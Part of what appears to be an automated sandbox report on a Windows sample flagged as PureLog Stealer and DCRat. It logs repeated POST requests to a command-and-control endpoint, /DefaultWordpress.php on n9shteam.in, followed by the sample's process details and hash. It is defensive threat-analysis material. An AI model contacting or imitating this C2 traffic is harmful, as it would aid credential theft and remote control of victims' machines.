                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:39.576502085 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:39.804928064 CEST | 933 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xvY0OL2CkUbZI1%2FprklsqPt1AcjGyAoRf006qFAecBFHYsGOuQ2EKkgbXLxdY6ppfVHOWzN1a6cS8i31trfWnQezeIskue52pehklJU4B2GPruUn3EkKgVyj7YJGzeVBx4JihrM6ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54abdd859657-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11566&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=126099&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          87 | 192.168.2.5 | 50066 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:38.873116016 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:40.928219080 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:41.301553965 CEST | 789 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O8FIWzbDb5tq2159UJW5WZlCOMIj8OUAn%2F3xI7fPnicbb9nexq%2FC5jy%2BUNy%2BE58mqvR1YQq4pX5KXq4usUevZSKRTdNfzqGf5KCuUx2XL8K4meJAHcHDVkfdvlbnEjp3Ob63tLlQfw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54b44882cf16-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12981&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=112711&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          88 | 192.168.2.5 | 50067 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:41.437392950 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:42.879352093 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:43.257566929 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZENAGjRd4Sd0HUta8zGn1e42p9anWv9Gqa5AH5w9X17Qul1cSGxYkzUwLqgu%2FLGmoVjFzPN%2FeRfNN1qHj3pAT1rrth9Q21UyN9Llk9DRgIs3VHNjDGgvvVAKgqVIUe8%2FT1fBjnSrAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54c07aa396e9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11647&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=123813&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          89 | 192.168.2.5 | 50068 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:43.394727945 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:44.201756001 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:44.597099066 CEST | 791 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jKSagUUZlkp2rEfpsW727nqU%2F9AW%2B6vhuJ9GMidV5JAwToJO%2FQThvcgKKKHhjv2IHWhhgIaiLiNuUBDpFo8QyCPqAoRhX45qMlf7w1NcmZxGQsV%2BHaj%2FJltCYRaohNVhgBCQfzwAHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54c8bc0496ed-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13535&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=106314&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          90 | 192.168.2.5 | 50069 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:44.730155945 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:45.511482000 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          91 | 192.168.2.5 | 50070 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:44.812553883 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:45.600344896 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:45.852332115 CEST | 940 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JatTKc6wXBW3%2BQ9zypZ2n3QFBi3PITch72s5G0%2FwdnRc1GUU6nMP2cPICqaOsv0LIffsS3%2BdVtUcOGeSLJVrEcQKLvT9ru8om2pHV9TLFlRhDTmZS%2FSIVnDHDA%2FBSEOcv9D5v3MeLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54d17a4217ee-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11607&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=125216&cwnd=68&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          92 | 192.168.2.5 | 50072 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:46.023811102 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:46.368858099 CEST | 2520 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:46.821268082 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:47.063595057 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PmAUtevQzj33Iwwj36U2gDFQFd1kKtZOGT2D1RHheefeEgQmHKOk%2FYlIZp9hJ09QixsblEEZDF%2FvJoDNukQpnxeztpxZZPDeOmQ9aVnbGnEFC4Xqn6UgKSHIXpQn75vdxWGaps%2BcTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54d918e77af4-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11188&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2831&delivery_rate=131064&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          93 | 192.168.2.5 | 50073 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:47.201951981 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:47.556387901 CEST | 2528 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:48.004616022 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:48.786125898 CEST | 783 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DzXcGex1riKOrQWkDFmH0DzPQLUpc33lelpTYrmOPDTRIfiv2chvXHzDHko0J4m10qPHLtEPkj7ojaoo3zdt8nLyZLMMeMWpYeK4mZBx1GhBsz3Bww93mXvJh4Zjtjl%2BZ5Ut1uZMyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54e07c5324fc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11163&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=129679&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          94 | 192.168.2.5 | 50074 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:48.917853117 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:49.277443886 CEST | 2528 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:49.694061995 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:49.928862095 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=upQbZukMyD56lmJXCKeCImJLh5jkEl2OjsseAIv%2Bj8G7ucBIQirxPUiYET9o0NPQJSK15oQvCU%2FsA7MBaJX%2FzgUN%2Bh%2BygT1XEA54wjAzldeBGE9dn8piBxXQoBBWOYW0cD65%2FytVSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54eb0ebe69a2-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13024&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=108806&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          95 | 192.168.2.5 | 50075 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:50.058036089 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:50.415762901 CEST | 2528 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:50.831809998 CEST | 25 | IN | HTTP/1.1 100 Continue


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          96 | 192.168.2.5 | 50076 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:50.859874964 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1948
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:51.212547064 CEST | 1948 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:51.664496899 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:51.913064957 CEST | 938 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=metWjVbf7WSzcbvgzZMzrq%2F%2FLQQcX%2BSkxFuEdvx5GyIBvx0xNZrA1lQxDXCwCK0aHCvcktSsObluE3j4hpNYU33bVxog72bfkI9Rr3nFAInc1cxdsD6AIL7VELub9A1vb%2FSxgeav6w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54f76955cecd-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11310&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2259&delivery_rate=128733&cwnd=57&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          97 | 192.168.2.5 | 50077 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:50.982585907 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:51.340172052 CEST | 2528 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:51.786750078 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:52.014199972 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YfjBxc1gn6C%2F0F3RmUQQs4WLEySfiqOxp%2Fg6pmWf6UrdDcCw5K7Oj4lVlZ2sZbM49R2LaBNo35gt0s9ogE%2Flo3zkL8QARmft2XrHejjGCh0Crvqxtd4KXtZxyS1wbV6M1zV4AXJCAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a54f828d267d6-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13758&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=108684&cwnd=56&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          98 | 192.168.2.5 | 50078 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:52.137092113 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:52.495462894 CEST | 2528 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:53.147727013 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:53.402476072 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sNUBDQdunDPoj66FoFXtrPy%2FnKIKRDBO4pttr%2FMs5mtrYQ6mcHPo%2FuHLAbONmBotTYDiUlSKpWqcG4jBP8cPI2pvmWW3uQ6F9ilru3SMVKlDAWvGPnOpVtUGsWlo6kw8OKJJMVwHAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5500ab01176a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11180&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=126540&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          99 | 192.168.2.5 | 50079 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:53.537488937 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:19:53.884363890 CEST | 2528 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:54.304306984 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:54.686629057 CEST | 790 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PqSqjjk2GSU5138UUW4%2BIgR1S4k1uACyAF4BI84AE82%2Bd88XBXDNbTqHiRd9fs1X73pTKwr0DK27DWeyZ%2FEFVRhoktmTuqqYf8C8kJBi3uIH0l2kYgoKEfr3oQM9pw3a7%2Bwe1W0OWQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5507ecae7af1-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12880&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112431&cwnd=174&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                          100 | 192.168.2.5 | 50080 | 188.114.96.3 | 80
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:19:54.813407898 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:19:55.165651083 CEST | 2528 | OUT | Data (request body)
                                                          Oct 20, 2024 18:19:56.106220961 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:19:56.335443974 CEST | 793 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:19:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kqR%2B9i1EWz6TCJSqPf6izN3nBW57FFHT9GPeAQpopcHkKDeXe%2B3w2Sq4%2FUxNACXm8AoMpiKOyAyiCoaJ%2FgfTTDC%2BACS4fEqQPEAwNSpQow2ifF8fpXTFFtD3ub9e42wh%2BDOhZsuWXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a55132d10230a-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13098&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=111204&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0



                                                          Target ID:0
                                                          Start time:12:17:12
                                                          Start date:20/10/2024
                                                          Path:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\9XHFe6y4Dj.exe"
                                                          Imagebase:0x680000
                                                          File size:16'272'384 bytes
                                                          MD5 hash:8213A9C837181823A4D58728637EAEB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2087739498.0000000000682000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline"
                                                          Imagebase:0x7ff6686a0000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:12:17:19
                                                          Start date:20/10/2024
                                                          Path:C:\Windows\System32\conhost.exe
